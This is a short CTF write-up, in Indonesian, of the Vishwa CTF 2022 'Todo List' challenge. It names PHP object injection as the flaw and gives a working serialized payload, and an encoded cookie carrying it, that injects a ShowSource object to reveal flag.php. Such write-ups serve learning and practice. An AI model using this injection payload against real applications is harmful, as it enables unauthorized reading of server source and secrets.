Skip to content

Vishwa CTF 2022: Todo List

list : https://t0-d0-l1st.vishwactf.com/

kata kunci

PHP Object injection

Bacaan

Vulnerable

a:3:{i:0;s:5:"hello";i:1;s:5:"there";i:2;O:10:"ShowSource":1:{s:6:"source";s:8:"flag.php";}}

cookies-> todos=8a7c8919d6144fbef005470cdf9c6c01c350abd0a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22there%22%3Bi%3A2%3BO%3A10%3A%22ShowSource%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D